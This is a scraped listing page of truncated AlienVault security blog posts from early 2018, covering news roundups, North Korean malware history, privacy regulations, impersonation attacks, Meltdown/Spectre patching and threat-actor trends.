should pay attention to. What is normalization in SIEM? Various different software, hardware, and networking component vendors use their own event log formats. An event log will have different information fields. A SIEM system will do its best to read the various event log formats in order to make sense of them. If you make Excel spreadsheets, imagine all of the different ways someone could d Guideline
AlienVault.webp 2018-02-16 14:00:00 Things I Hearted this Week 16th Feb 2018 (lien direct) Rolling in the bounty We hear a lot about bug bounties and how some people are potentially making a lucrative living off it. HackerOne has paid out over $24m in bounties in the last five years. That’s some serious cash, considering how far that translates into local currencies. So, they asked some of their top hackers how they spent their money. How hackers spend their bounties | HackerOne SIM hijacking, the aftermath In last week’s roundup there was a story about SIM swapping and how T-mobile USA was sending texts to customers stating they may be victims of fraud. We often cover such stories, shake our heads and tut loudly before moving on. But Motherboard got in touch with nine victims of SIM hijacking and told their stories. It’s quite a wake-up call to the real-life impact scams and fraud can have on individuals. ‘I Lived a Nightmare:’ SIM Hijacking Victims Share Their Stories | Motherboard Cryptocurrencies Not entirely security related news, but hey if everyone is referring to it as ‘crypto’ I can include it here right? Joseph Steinberg considers what the future holds for Bitcoin, which sits at the head of the table of cryptocurrencies today, while other currencies are nipping at its heels. Will Bitcoin become the MySpace of Cryptocurrencies? | Joseph Steinberg Another cryptocurrency theft Italian Cryptocurrency Exchange BitGrail Lost $170 Million Worth of Nano to Hackers | InterestingEngineering Mining stuff There are lessons to be learned from government websites serving cryptocurrency miners | Virus Bulletin Could Bitcoin break the NHS? Latest crypto-jack attack ‘the first of many’, say experts | Express AI recognition Chinese police are wearing sunglasses that can recognize faces. No, that’s not a plot of a movie, but what’s actually happening. 
Railway police in Zhengzhou, a central Chinese city, are the first in the country to use facial-recognition eyewear to screen passengers during the Lunar New Year travel rush. The devices have allegedly already helped nab seven fugitives related to major criminal cases such as human trafficking and hit-and-runs, and 26 others who were traveling with fake identities. While that may be well and good, there are some issues with facial recognition. Joy Buolamwini, a researcher at the M.I.T. media lab, has shown how real-life biases can creep into A.I. The result is that for a white man, facial NotPetya Wannacry
AlienVault.webp 2018-02-15 14:00:00 North Korean Cyber-Attacks and Collateral Damage (lien direct) WannaCry was incredibly destructive. The attackers made about $150,000 - but the total damage caused by WannaCry has been estimated in the billions of dollars. There is strong evidence linking WannaCry to a group of hackers known as ‘Lazarus’, reportedly operating out of the DPRK (North Korea). Whilst WannaCry is perhaps the most famous attack by Lazarus, it isn’t the only ‘collateral damage’ caused by the DPRK’s cyber actions. Below we disclose new details on three attacks that have spread out of control. Two likely originating from the DPRK - and one targeting the DPRK. The Voice of Korea and the Rivts Virus This section describes a piece of malware that may have been created within the DPRK as part of a test project - and accidentally leaked out onto the wider internet. A simple file-infector We triage many millions of malicious files automatically every day in an effort to ensure our customers are covered from new threats. One malware family we regularly see, called Rivts by antivirus vendors, was originally created in 2009 but still continues to spread. Rivts is a file-infecting worm - it spreads across USB drives and hard drives attaching itself to files to spread further. The new files we see every day are the result of new files being infected with the original worm from 2009 - not new developments by the attacker. Overall, it’s a fairly boring file infector (or “virus”). But there was one very strange thing that caught our eye. North Korean Software As part of its initial infection process, Rivts checks for the presence of system files normally found on Windows XP to infect first.
But it seems to expect two pieces of uncommon software in the Windows System folder: Below are the details of these two files, nnr60.exe and hana80.exe: Whilst the DPRK is well known for developing its own Linux-based operating system, and there is evidence of some DPRK hackers using NotPetya Wannacry Yahoo APT 38
AlienVault.webp 2018-02-14 14:00:00 Tips To Avoid LOVE-INT On Valentine's Day (lien direct) Valentine’s Day; that ever-venerated holiday celebrating human love. On a day festooned with pink hearts, mushy card exchanges, chalky candies and proclamations of undying love both for lovers and classmates alike, one thing most people try to avoid is thinking about their history of romance with people who are no longer in their life. The only problem is that occasionally, those exes don’t necessarily stop thinking about their exes. Occasionally, abusive exes become a problem and when they do, it helps to take some appropriate steps to protect yourself immediately after a breakup to prevent them from using Open Source INTelligence (OSINT) to spy on you, or otherwise make your life difficult. Strategy When deciding how best to avoid OSINT that can be used to harass you in the future, it can help to break up the recorded details of your life into two broad categories: things you can hide or change, and things you can’t, or that are difficult to hide or change. For the sake of this post, we will only be dealing with things that we have easy, online or physical control over. As always, it’s best to consult your threat models and apply reasonable measures to avoid whatever threats your particular ex may pose to you. Scrubbing public profiles is the first, easiest way to ensure that you aren’t sabotaging your own effort to avoid contact. Some simple steps you can take to increase your OPSEC include: Change all of your account passwords ASAP — If your instincts label someone as dangerous enough to alter publicly available information about yourself, it’s likely that their behavior follows a pattern that existed while you were together with them. Assuming close and personal contact with someone often means that you make exceptions to your threat models that allow them into close personal contact with both you and your devices.
Never underestimate the lengths an untrustworthy ex-boyfriend or girlfriend will go to in order to snoop on you, so it’s best at minimum to ensure your passwords are in a controlled state. While you’re doing this, be sure to sign out of all other points of access for any given service. Revoke private keys and generate new key pairs — Physical access to electronic assets lends itself to theft of sensitive information that you may be holding to protect your communications, such as PGP keys. If you suspect that your keys may have been compromised, it never hurts to revoke and regenerate keys just to be safe. On the subject of keys, re-keying your door locks and changing garage door codes can be a good way of re-establishing your physical security, and reclaiming confidence that your environment is untouched while you’re gone. Secure crypto-coin wallets — Along with PGP keys, coin wallets are another source of electronic information, meant to be kept private, that can easily be compromised by someone who knows what they want, knows where to find it, and has implicit access to the location where they are kept. With ever increasing links between electronic and financial security, if one is compromised the other may be as well. Consider fresh installs of your operating systems and factory-resets of your phone — This may seem a little extreme, but it is an especially good idea if your devices were ever left alone with your formerly-beloved for any amount of time long enough to exploit. A backdoored phone or notebook would be a prime, continuing source of love-INT and in this post-FlexiSpy world, where commodity spyware is more accessible than ever to
AlienVault.webp 2018-02-12 14:00:00 Global Cybersecurity Concerns in 2018 (lien direct) People around the world are becoming increasingly connected with smart devices. Sending and receiving massive amounts of data back and forth, we rely on the transfer and storage of data on a daily basis. Hackers and cyber attackers know this and know how to steal data for their profit. Your job as an information security specialist is to defend your company’s data, implementing preventative and protective measures and monitoring your data and systems. With the increasing amount of data businesses and their customers are producing comes an increasing number of people maliciously trying to obtain it. In 2017, we saw increases in ransomware attacks, financial fraud and massive data breaches. It was a busy year for security practitioners, and 2018 will be no different, with new global regulations, redesigned threats to new devices, and ways to combat those threats. Let’s take a look at some cybersecurity issues every InfoSec specialist should be aware of in the coming months of 2018. Upcoming Requirements of the GDPR The General Data Protection Regulation is the European Union’s way of protecting its citizens’ data by holding organizations and companies accountable for how their security personnel handle sensitive information. As of May 25, 2018, companies will risk severe fines if they are not in compliance with the GDPR data protection rules. In an effort to minimize the damage done during recent data breaches, rules will be implemented on how you and your company obtain and secure data, as well as on notifying users of a breach immediately. Under the GDPR, companies will rely on their IT security specialists to: Be given explicit consent when obtaining customer data. Be clear and upfront with customers in how they’ll obtain this data in language that is accessible and easy to understand.
Comply with data protection officers who will inventory data in the EU, including outside company data that pertains to goods and services held within the EU. In the event of a breach, notify the public within 72 hours or be penalized. The EU isn’t the only geography implementing privacy measures for its citizens. Australia implemented privacy regulations recently as well. The Liabilities of IoT In a day and age where humans are increasingly integrating the internet into their day-to-day lives, we have no choice but to submerge ourselves in the internet of things (IoT). This includes the business world as well. Mobile devices have become a necessity, and a network of connected smartphones, tablets and other smart devices has made it considerably easier for businesses to access information from the internet and communicate. It also has made it considerably easier for hackers to get their hands on the same information — which is, in turn, making it harder and harder on the InfoSec practitioner. For usability purposes, nearly everything can be connected to Wi-Fi. A company’s smart coffee pot can be connected to an iPhone for a convenient cu
AlienVault.webp 2018-02-09 14:00:00 Things I Hearted this Week 9th Feb 2018 (lien direct) Much of this week’s news cycles were dominated by SpaceX successfully launching the Falcon Heavy rocket into space. Putting aside concerns of the cost, the feasibility, or other criticisms, it was just nice to see something positive and optimistic grab the headlines for a change. But that doesn’t mean the intergalactic world of cyber security sat quietly, oh no, we’ve got a whole bunch of things to talk about, so let’s jump right in. The House That Spied on Me By far one of the most engaging pieces I’ve read in a while is this Gizmodo article by Kashmir Hill and Surya Mattu on what happened when they decided to connect a whole bunch of “smart” devices in her apartment, and monitored what data was being collected and sent by these devices. The house that spied on me | Gizmodo Related Your TV is probably tracking you -- here's how to stop it | Cnet Boffins crack smartphone location tracking – even if you've turned off the GPS | The Register Amazon Says Don't Worry About This Raspberry Pi Key Hack -- But Is Fixing It Anyway | Forbes Ethereum Scammers make $5,000 in a night “Online scammers have made over $5,000 worth of Ethereum in one night alone, showing how gullible some cryptocurrency users can be. Miscreants achieved this by creating fake Twitter profiles for real-world celebrities and spamming the social network with messages tricking users to participate in "giveaways." Crooks deceived users into sending a small amount of Ethereum, promising they would receive the sum ten times over as part of the giveaway.
All the messages followed the same pattern, even if the sums and Ethereum wallet addresses varied between the fake Twitter accounts.” Ethereum Scammers Make $5,000 in a Night by Impersonating Celebs on Twitter | Bleeping Computer Hunting Insecure Direct Object Reference Reading bug bounty reports where the researchers recount their steps are probably some of my favourite types of posts where I always end up learning something new. And this by Mohammed Abdul Raheem is no different. Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (part 1) | Codeburst.io Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (PART 2) | Codeburst.io Privacy down under While all eyes have been on GDPR, the Ozzies don’t want to be left behind as the Office of the Australian Guideline
AlienVault.webp 2018-02-08 14:00:00 How Dangerous are Impersonation Attacks? (lien direct) Amongst the types of cyber attacks happening, impersonation attacks are an interesting evolving category. Such attacks are generally targeted at corporate employees. The attack is executed by sending an email to the target in which the sender attempts to masquerade as a trusted source. This is done in order to gain access to the target’s sensitive information, such as financial data. The U.S. Federal Bureau of Investigation (FBI) has warned businesses about this growing threat and has estimated that such attacks have caused losses of approximately $5.3 billion globally. A common example of impersonation attacks is Business Email Compromise (BEC) or "CEO fraud", which continues to manipulate companies by using false identities. This can severely damage a company’s reputation. This blog from last year explains BEC in detail. Why are Impersonation Attacks Hard to Detect? The major reason these attacks are difficult for users to detect is ignorance and lack of attention to detail. Let’s understand this through an example: Below is the same email address written twice; how fast can you spot the one with the error? eeryaeel@reveantivirus.com eeryaeel@reventivirus.com It is hard to figure out the irregularity, especially when you have a hectic schedule at work and many distractions. How are Impersonation Attacks Constructed? Finding the Target With the help of social engineering techniques, attackers look for potential victims. Facebook, LinkedIn and Twitter profiles are the easiest mediums for attackers to collect information about their target. Name, email address, school, job title, short bio, job duties, location, etc. can be easily fetched by attackers from the target’s social media accounts. Social engineering, which requires very little technical skill, can typically get attackers an unbelievable amount of information about the victim, freely available online.
Creating Credibility Now, as the attacker has a significant amount of the target’s information in hand, the next step is to build credibility. Again, social engineering is an effective way to set the stage for the attack. The attacker will try to figure out who to impersonate. It could be the victim’s boss, one of his colleagues or someone close to him. Close friends can be found on Facebook, and people tend to be very trusting if they think they are dealing with close friends. Through the company website and social media pages, the attacker can easily pick the person to impersonate. Executing the Attack The final and the most important step is to choose a type of attack. The top 3 tactics used by attackers are listed below: By Registering a Look-Alike Email Domain The attacker can register a similar email domain and create a new email ID using a similar name to the person being impersonated. The attacker sends an email message to the target asking them to respond urgently. For instance, impersonating the target’s boss, the attacker creates an email ID Smith@reventivirus.com and asks the victim to make an urgent payment for an invoice attached to the message. Editing the Display Name The majority of the mobile email clients only show the display n Yahoo
AlienVault.webp 2018-02-07 14:00:00 How to Handle Meltdown and Spectre: Patch, But Don't Rush It (lien direct) Welcome to 2018. If you’re still catching up, one of the first things on your radar is probably Meltdown and Spectre — two massive CPU vulnerabilities that have sent the security and broader tech world spinning. There is plenty of additional data to be found about the actual technologies involved and the likely attacks that will probably follow, but the baseline of what you need to know is that there is a flaw in one of the ways that Intel uses to improve the performance of their chips. If you want a comprehensive technical view, including some descriptions of PoCs of potential exploits, take a look at the original Google Project Zero post. If you are looking for something a little higher level, that includes more actionable pointers, I’d recommend this clear guide to Meltdown and Spectre patches. As for this post, I’m not going to provide another analysis of Meltdown and Spectre, and I’m also not going to pass judgement. I’m mainly concerned with what organizations are doing to defend themselves. Despite all the press and publicity (a Google query for “meltdown and spectre” yielded nearly three million entries after only 14 days) there has been little in the way of solid recommendations to blunt the impact of the problem. Microsoft has provided patches to block access to vulnerable operations, but these are offered with warnings about side effects and potentially disruptive software interactions. Similarly, Intel has released, then issued warnings on, firmware updates that were intended to help. There is an overarching sense of confusion about the right next steps, especially around the right timing to adopt these remediations. Seeing this, we kicked off a quick survey to find out how people were coping, and whether this critical and noisy problem was spurring rapid response, or whether those measures were being impacted by some of these negative reports.
If you haven’t yet decided exactly what to do, you are not alone. Across the set of respondents, 95% of whom are directly responsible for security updates, only 21% had applied the Microsoft patch to more than 75% of their systems. Most of them, 51%, had patched less than a quarter of their systems, and 61% acknowledged that they were aware that these patches could cause adverse interactions with other products. This does not need to be the fire drill it may currently feel like. The best advice for dealing with this situation is to recognize that the changes that major firms like Microsoft, Oracle, Apple, and others had to make are serious modifications to low-level system behaviors, changes that may impact their own performance, or that of other applications. These second-order consequences can be nearly as damaging as any eventual attack that exploits these flaws, particularly if widespread updates cause intermittent or widespread downtime. This event provides security leaders with the opportunity to show balance. A knee-jerk reaction is to instantly apply the patches when available, cleaning up the fall-out as it happens. But why? Currently Guideline
AlienVault.webp 2018-02-06 14:00:00 Debunking these 3 Domain Name Registration Myths Once and For All (lien direct) Let’s be honest: Domain names suck. It’s a pain to come up with possible variations. It’s time-consuming to sift through which are available (none are). And going through the process of buying an unavailable one is about as much fun as a root canal. But there’s a reason they’re such a hassle. There’s a lot riding on them. There’s a massive difference between a good one and a great one. Many times, that difference is millions or billions. That sounds like an exaggeration, but it’s not. Here’s why. Myth #1. Domain Registrations Increase SEO Exact match domains (EMDs) used to be a thing (or still are, depending on who you talk to). You stuffed a few keywords into the domain before checkout to give yourself that extra edge to rank for cut-throat queries like “bestvitaminshop.com.” Domain age has also been rumored to influence rankings. Somehow, the older the domain and the longer you register it for tells Google… to like you more? Admittedly, the logic is flimsy. But Google originally debunked these myths in 2009, according to some digging by Matt McGee at Search Engine Land. First, they had a Google Webmaster Help forum thread where Googler, John Mueller, addressed this question head-on: “A bunch of TLDs do not publish expiration dates — how could we compare domains with expiration dates to domains without that information? It seems that would be pretty hard, and likely not worth the trouble. Even when we do have that data, what would it tell us when comparing sites that are otherwise equivalent? A year (the minimum duration, as far as I know) is pretty long in internet-time :-).” Next up, they had former Google PR chief, Matt Cutts, on the record several times addressing this issue: “To the best of my knowledge, no search engine has ever confirmed that they use length-of-registration as a factor in scoring. 
If a company is asserting that as a fact, that would be troubling.” So there you have it. “Officially,” domain registrations don’t affect SEO. At least, not directly. Recently, there’s some evidence that search engine result page (SERP) click-through rate (CTR) affects rankings. One experiment had a sizable group of people click on a random listing in the seventh position to see what (if any) changes occurred. And within just a few hours? Straight to the top. (image source) The finding shows an odd correlation between SERP performance and its influence on ranks. The point of this being that it is possible that a better domain name, one that’s more credible and interesting for people to click, could indirectly influence rankings. The industry standard .com domain is still seen as the most credible, even though new top-level domains (TLDs) continue to pop up and gain acceptance. Studies have backed this up, showing that .com domains generally dr APT 19
AlienVault.webp 2018-02-05 14:00:00 Australian Privacy Act Gets New Notification Requirements (lien direct) With GDPR the focus of many press headlines across the world, you’d think it was the first and only regulation covering the privacy of individuals! However, privacy regulations exist in numerous countries around the globe, and anyone in Australia or its territories will be all-too familiar with the Australian Privacy Act 1988 (which, for simplicity, I'll just refer to as 'the Privacy Act' from this point forward). Governed by the Office of the Australian Information Commissioner (OAIC), the Privacy Act introduces 13 Privacy Principles (known as Australian Privacy Principles, or APPs) that guide how the personal information of Australian subjects must be managed. Failure to protect personal information is deemed, “...an interference with the privacy of an individual,” with financial penalties that can go up to AUD$360,000 for individuals, and up to AUD$1.8M for organizations. What’s top of mind for many who are subject to the Privacy Act is a new amendment -- the Privacy Amendment (Notifiable Data Breaches) Act of 2017. Inspired by the proliferation of personal information stored in electronic form, such as social media content, healthcare records, and more, the amendment acknowledges the increasing risk (and occurrences) relating to breaches of that data. Starting 22 February 2018, the amendment introduces the Notifiable Data Breaches (NDB) scheme. This requires organizations to notify individuals of an ‘eligible data breach,’ which is defined as when BOTH the following conditions are met: An individual’s personal information has been subject to unauthorized access, disclosure, or loss; and The breach is likely to result in serious harm to that individual. Who Needs To Comply with the Australian Privacy Act? 
The Privacy Act applies to all Australian government agencies, businesses, and non-profit organizations with an annual turnover of more than AUD $3 million. In addition, small businesses and organizations with an annual turnover less than AUD$3 million who fall into the following categories must also comply with the Privacy Act: Private sector health service providers including: Traditional healthcare providers (hospitals, day surgeries, medical practitioners, pharmacists, health professionals). Complementary thera
AlienVault.webp 2018-02-02 14:00:00 Things I Hearted this Week, 2nd Feb 2018 (lien direct) January 2018 finds itself in the rear view mirror, which probably means I can’t wish Happy New Year to anyone I haven’t spoken to since December. But if I haven’t spoken to someone for that long, I do begin to question why I even bother speaking to them at all… One thing I don’t ever stop to question though is what’s going on in the world of security, so let’s take a look back over the most newsworthy items to come across my virtual desk. Password manager vulnerabilities You may remember a few weeks ago where Freedom to Tinker published findings about two scripts that exploit browsers built-in login managers to retrieve and exfiltrate ID’s. The most commonly-asked question on the back of that was “which password managers should I use?”. Luckily, my friend Adrian Sanabria has done the legwork for you and compiled a list of password managers across different browsers and whether they leak credentials or not. Password Manager Vulnerability Silently Giving Up Credentials | Threatcare The follower factory A very well researched and presented piece by the NYTimes on the business of buying fake followers, what it means to those that buy it, the companies which broker fake identities, and the impact to social media platforms. The follower factory | NYTimes Somewhat related Here’s why the epidemic of malicious ads grew so much worse last year | ars technica Who will pay for Spectre? Probably you What do Toblerone and Brexit have in common with Spectre? A whole lot more than you may think. Who will pay for Spectre? Probably you | Owen Rogers, Medium GDPR Even my spellcheck knows not to question me whenever I type GDPR these days. But that’s not to say it isn’t a topic which generates good discussion. 
Two pieces that recently caught my eye were: Things to consider before publishing an article about GDPR | Rowenna Fielding / LinkedIn Data Protection, Security, and the GDPR: A fuzzy and fraught relationship | Infospectives The great crypto-currency rush Whether you believe that cryptocurrencies are a bubble, or the next big thing in online payments, there is no denying that it is a hot commodity at the moment. So much so, that criminals are putting a lot of effort into trying to illegally gain a slice of the crypto-pie. The attacks come from a variety of angles. A criminal was able to steal about $150,000 by tricking Experty users into sending their
AlienVault.webp 2018-02-01 14:00:00 Mitigating Blockchain Analysis: Mixing Cryptocurrency (lien direct) Cryptocurrency and Blockchain Analysis Cryptocurrency is a digital currency, and it comes in many forms, built upon varying Blockchain technologies. Bitcoin is the original cryptocurrency, created in 2009 by cypherpunk Satoshi Nakamoto. Since then, many new alternative cryptocurrencies have been created, popular alternatives are Litecoin, Ethereum, and Monero. Samuel Falkon had it right when he said that “cryptocurrencies are a dream for privacy and freedom lovers because they restore transacting power back to whom it belongs — individuals who have a right to control their own money.” While cryptocurrency is a great advancement for a cypherpunk’s dream of privacy, it still comes with its own set of flaws that allow for deanonymization through Blockchain analysis and off-chain analysis. Bitcoin is often thought to be an anonymous solution for digital transactions, but this simply is not true. Every time a transaction is made, the technical details of said transaction becomes a public record on the Blockchain. The Blockchain is a public ledger that holds a history of all transactions ever made, thus leaving the potential for analysis of said transactions. Blockchain analysis services include: https://www.walletexplorer.com https://chainalysis.com https://scorechain.com https://blockseer.com https://coinalytics.co https://sabr.io https://elliptic.co http://numisight.com And many more More recently, The Bitfury Group released a whitepaper for their new Blockchain analysis algorithm with the goal of identifying the users behind digital transactions, dubbing their deanonymization solution as a “Bitcoin clustering” algorithm. Bitcoin address clustering is self-described as “a process that exposes bitcoin users by determining which addresses belong to a single user through an analysis of Blockchain data. 
The act of clustering groups those addresses together, enabling investigators to link them to a single entity.” (The Bitfury Group Unveils Solution For Analyzing Related Bitcoin Addresses, The Bitfury Group) The Bitfury Group’s analysis research should not be shocking to us. They perform Blockchain analysis, just as we should expect adversaries to do. The innovative part of this algorithm is that they are also analyzing publicly available information on the web, or as they call it “off-chain tag collection” to aid their clustering algorithm. There are two tag collection approaches that The Bitfury Group takes: passive and active. Off-chain tag collection for clustering, passive tag collection: The passive approach includes crawling the web for publicly available information, typically on
AlienVault.webp 2018-01-31 14:00:00 Threat Detection in a Changing Market: A Conversation with AlienVault MSSP Partner Sword & Shield (lien direct) Recently, I had a chance to speak with Jason Graf, director of managed security services for Sword & Shield Enterprise Security, a top Managed Security Services Provider (MSSP) based in Knoxville, Tennessee. We talked about the evolving threat landscape and the challenges associated with detecting and analyzing ransomware and other emerging threats on a daily basis. Graf started the discussion by providing context around Sword & Shield’s business, which has been protecting critical data for mid-to-large-sized companies for more than 20 years. The company started focusing on managed security services five years ago as attacks became more sophisticated and burdensome for companies. The MSSP’s core business is to provide 24/7 detection and response capabilities against cyber threats for its customers. “Sword & Shield combines expert analysts, proprietary processes, and advanced technology to protect our clients around the clock, 365 days a year. We take this responsibility seriously, so we only use technology that is up to the task.” Graf went on to explain that Sword & Shield’s managed security services also help companies to achieve industry compliance. “Compliance is a key driver of our services, particularly for companies in the healthcare and retail industries that need to satisfy regulatory and industry requirements.” Graf said the Sword & Shield team of security analysts monitors from 1,000 to 20,000 assets per customer environment, every day. That’s a lot of assets! Not only are there more assets than ever to monitor today, but security threats are also getting more complex and harder to detect. Sword & Shield relies on AlienVault® Unified Security Management® (USM™) to detect and analyze their customers’ threats.
USM includes built-in security controls and continuous threat intelligence updates from AlienVault Labs to simplify threat detection and incident response. A unified approach to security monitoring eliminates the need for Sword & Shield to manage multiple solutions, saving them time and money. Sword & Shield also leverages threat intelligence updates from AlienVault’s Open Threat Exchange® (OTX™), which monitors emerging threats from all over the world. By leveraging USM and OTX, Sword & Shield can focus on delivering value to their customers through threat detection and SOC data analysis to more rapidly grow their managed security services. Graf likes the comprehensiveness of USM as compared to other security solutions. He explained that it goes well beyond just providing traditional capabilities of SIEM and log management. “While other providers offer point solutions, AlienVault’s USM provides a holistic, unified solution with essential capabilities including intrusion detection and vulnerability management.” For Sword & Shield, pinpointing where hacker command and control communications are before they are used for malicious activities is important. The MSSP can consolidate their alarms, vulnerabilities and configuration issues into a single view through USM Central, our threat management console available with the USM platform. A consolidated view of the threats detected in their end customer environments enables Sword & Shield to work more efficiently and respond more quickly to any security incidents detected.
AlienVault.webp 2018-01-30 13:40:00 OTX Trends Part 3 - Threat Actors (lien direct) By Javvad Malik and Chris Doman This is the third of a three part series on trends identified by AlienVault in 2017. Part 1 focused on exploits and part 2 addressed malware. This part will discuss threat actors and patterns we have detected with OTX. Which threat actors should I be most concerned about? Which threat actors your organization should be most concerned about will vary greatly. A flower shop will have a very different threat profile from a defense contractor. Therefore we’ve limited ourselves below to some very high-level trends for particular threat actors, many of which may not be relevant to your organisation. Which threat actors are most active? The following graph describes the number of vendor reports for each threat actor over the past two years by quarter: For clarity, we have limited the graph to the five threat actors reported on most in OTX. This is useful as a very rough indication of which actors are particularly busy. Caveats There are a number of caveats to consider here. One news-worthy event against a single target may be reported in multiple vendor reports, whereas a campaign against thousands of targets may be represented by only one report. Vendors are also more inclined to report on something that is “commercially interesting”. For example, activity targeting banks in the United States is more likely to be reported than attacks targeting the Uyghur population in China. It’s also likely we missed some reports, particularly in the earlier days of OTX, which may explain some of the increase in reports between 2016 and 2017. The global targeted threat landscape There are a number of suggested methods to classify the capability of different threat actors. Each has its problems, however.
For example, if a threat actor never deploys 0-day exploits, do they lack the resources to develop them, or are they mature enough to avoid wasting resources unnecessarily? Below we have plotted a graph of the threat actors most reported on in the last two years. We have excluded threat actors whose motivation is thought to be criminal, as that wouldn’t be an apples to apples comparison. Both the measure of their activity (the number of vendor reports) and the measure of their capability (a rough rule of thumb) are not scientific, but can provide some rough insights: A rough chart of the activity and capability of notable threat actors in the last year Perhaps most notable is which threat actors are not listed here. Some, such as APT1 and Equation Group, seem to have disappeared in their existing form following very public reporting. It seems unlikely that groups which likely employ thousands of people, such as those, have disappeared completely. The lack of such reporting is more likely a result of significantly changed tactics and identification following their outing. Others remain visibly active, but not enough to make our chart of “worst offenders”. A review of the most reported on threat actors The threat actor referenced i APT 38 APT 28 APT 10 APT 3 APT 1 APT 34
AlienVault.webp 2018-01-29 14:00:00 Hackers Using AI? An Increase in the FUD Factor (lien direct) It’s hard to envision hackers, whether skiddies, APTs, or anything in between, using any sort of artificial intelligence (AI) or machine learning (ML) to attack a target network. Despite the availability of these sophisticated technologies, the most simplistic attack tactics continue to work. Enterprises aren’t patching known vulnerabilities; freely available malware can run in memory undetected; users continue to click on links they receive in email or allow macros on that innocent-looking office document; and internal network logs are often not collected and even more rarely kept for any period. If these methods work, why would adversaries turn to more complex solutions like AI or ML? Looking back on 2017, perhaps the biggest takeaway is that the most obvious methods still work. Adversaries seek the greatest mission gain with the lowest amount of resources expended and equities exposed. For example, Equifax wasn’t pwned by a fancy zero-day exploit or an insider with a USB drive; PII on millions of consumers wasn’t culled from S3 buckets because Amazon’s infrastructure was hacked by an APT; WannaCry wasn’t the result of a zero-day vulnerability; and people (amazingly) clicked Yes to download an update to Adobe Flash, giving us BadRabbit! Sticking with what works continues to pay off for all adversaries, irrespective of their resources, motives or intent. So, what’s with the fear mongering over hackers using AI and ML to attack their targets? AI (by which I mean both Machine Learning and AI in general) is the gift that keeps on giving. Most in the InfoSec community agree that AI has its place in the defense of the enterprise.
The problem is that few people understand how AI works or how to best apply it, and many cybersecurity companies take advantage of this situation by making fancy-sounding claims about the number of models they apply to the data or the types of mathematics they use to generate results. These claims generally go hand-in-hand with a dark-themed user interface with some sort of spinning globe or pew-pew map. And while defenders work to sift through the marketing blather and outrageous claims about cybersecurity products that use AI, some in the security world take further advantage and extend the FUD: what could be better to sow fear and confusion than claiming that hackers are now using AI to attack your network? The more observant in the InfoSec community have noticed that this language tends to originate with companies that stand to profit from the very same FUD that permeates the market. This FUD spreading takes on a few different forms, often by way of polls, as in, how many people believe hackers will use AI. There have been a few of these polls where more than 50 percent of the respondents agree that this is a real threat. For the life of me, I can’t understand why. The other way is through companies that make the claim. This comes in the form of sponsored posts on various InfoSec news sites, or interviews with company executives. There have been claims made about adversaries detected and intrusions executed using AI; while this may come to pass in the future, it’s incredibly unlikely any time soon. There are simply too many ways for adversaries to attack networks and accomplish their objectives using far more simplistic and less risky tactics. An adversary who has mastered the use of AI in their operations would only use it for the hardest of the hard targets, and even then, they’re likely to find an easier way to achieve their objective.
Yet, it’s important to note that the academic and security-minded research into hackers’ use of AI is real, and important. Adversarial machine learning is one angle. This work is important; it helps understand the cap Wannacry Equifax
AlienVault.webp 2018-01-26 14:00:00 NY State Department of Financial Services New Cybersecurity Regulation – CISO Attestation Due Feb 15 (lien direct) The first New York State (NYS) Department of Financial Services (DFS) CISO Attestation is due on February 15th. Last year, the NYS DFS enacted a new cybersecurity regulation that affects all financial companies that conduct business in the State of New York. The regulation is targeted towards financial companies that conduct business in New York State.  A "Covered Entity" means any Person operating under or required to operate under a license, registration, charter, certificate, permit, accreditation or similar authorization under the Banking Law, the Insurance Law or the Financial Services Law of the State. A company need not be domiciled in the State to be subject to the regulation.  (Very similar to how GDPR is set up.) Financial institutions include banks, money managers, and insurance companies. There are exceptions, but they are quite limited (based on institutional income and employee count). The impact of this regulation is very broad. In previous articles, I discussed the evolution of the regulation, as well as some of the important milestones that must be achieved in order to achieve compliance with the regulation. The first milestone date passed back in August, and now, the next important milestone is looming whereby the designated CISO of each financial organization must file the first certification of the organization’s compliance with the regulation. The regulation includes the letter that must be filled out and filed with the Department of Financial Services.  It is a simple, somewhat inelegant form, but it packs a powerful legal punch in that the CISO is attesting that the regulation is being followed.  This means that your organization must have implemented the six items required in the first milestone. 
The reason why this simple form is so powerful is due to the undefined enforcement powers of the regulation.  The exact language states: “This regulation will be enforced by the superintendent pursuant to, and is not intended to limit, the superintendent’s authority under any applicable laws”.  To a tech person, those sound like some very broad enforcement powers. One has to wonder if enforcement will be limited to prevention of a non-compliant business from conducting operations in New York, or perhaps they can be as harsh as those prescribed in the GDPR, which becomes effective in May.  Cybersecurity has now gone very mainstream and become very serious.  Now is a good time to review if your organization has stayed on track with the regulation’s milestones.  Please also note that the next milestone is March 1st. Many of us in the InfoSec community anticipated that this new era of cybersecurity regulation was on the way.  However, now is not the time for any “I told you so” smugness.  Remember, it is our job to guide organizations about how to meet the requirements of these new regulations.  Remember, if you are not the CISO, then you are probably responsible for making the CISO’s job easier.  Let your expertise lead Guideline
AlienVault.webp 2018-01-25 14:00:00 When Bad Language Happens To Good Systems (lien direct) In my last blog, I wrote about how words are created and then become mainstream over time, and how that time is longer for normal words, and shorter for words used to describe things in tech. But it’s not always straightforward, nor does it always land in the correct place. To illustrate, I give you “on premise” versus “on premises”; a battle that has happened to every company that’s ventured into the Cloud (which is a whole other language discussion we’ll have some other time). In 2013, Brian Madden fired the first shot of the linguistic resistance to the term “on premise”: And then, after much discussion, in 2014, he conceded defeat. “I'm saddened that the industry seems to have adopted the grammatically-incorrect term "on premise" in place of the actual term, "on premises" when discussing where servers will live.” he wrote. He goes on to bemoan the fact that “VMware, Citrix, and Microsoft all preferring the term "on premise" over "on premises" in their official press releases and technical documents.” He continues on to say that “Or maybe this is the evolution of language. It's shortened, perverted, and flexed to evolve with the times. Fine, let's call it linguistic evolution.” Brian, dude. We can do better. This isn’t evolution; this is people being incapable of finding an online dictionary. The Merriam-Webster Online Dictionary, our dictionary of choice here at AlienVault, is pretty clear on the difference between the two terms.
Premise: a : a proposition antecedently supposed or proved as a basis of argument or inference; specifically : either of the first two propositions of a syllogism from which the conclusion is drawn b : something assumed or taken for granted : presupposition whereas Premises: a : a tract of land with the buildings thereon b : a building or part of a building usually with its appurtenances (such as grounds) further, On premises:  inside a building or on the area of land that it is on  Full meals are available at restaurant on premises. No smoking on premises. Tom at The Networking Nerd, a word geek after my own heart, brings us the etymology: The etymology of these two words is actually linked, as you might expect. Premise is the first to appear in the late 14th century. It traces from the Old French premise which is derived from the Medieval Latin premissa, which are both defined as “a previous proposition from which another fo
